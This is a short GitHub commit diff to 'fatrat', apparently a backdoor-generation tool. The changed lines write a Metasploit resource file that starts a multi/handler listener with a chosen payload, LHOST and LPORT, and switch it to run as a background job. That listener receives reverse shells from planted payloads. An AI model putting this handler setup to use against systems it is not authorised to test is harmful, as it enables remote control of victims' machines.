Update fatrat

This commit is contained in:
peterpt 2017-03-20 09:20:45 -04:00 committed by GitHub
parent 4cecc531bd
commit 114921d3d4
1 changed files with 1 additions and 2 deletions

3
fatrat
View File

@ -1812,8 +1812,7 @@ echo "use exploit/multi/handler" > $svf
echo "set PAYLOAD $payload" >> $svf
echo "set LHOST $yourip" >> $svf
echo "set LPORT $yourport" >> $svf
echo "exploit" >> $svf
echo "exit -y" >> $svf
echo "exploit -j" >> $svf
echo -e $okegreen "Configuration file saved to $list/$save.rc"
fi
echo -e $okegreen ""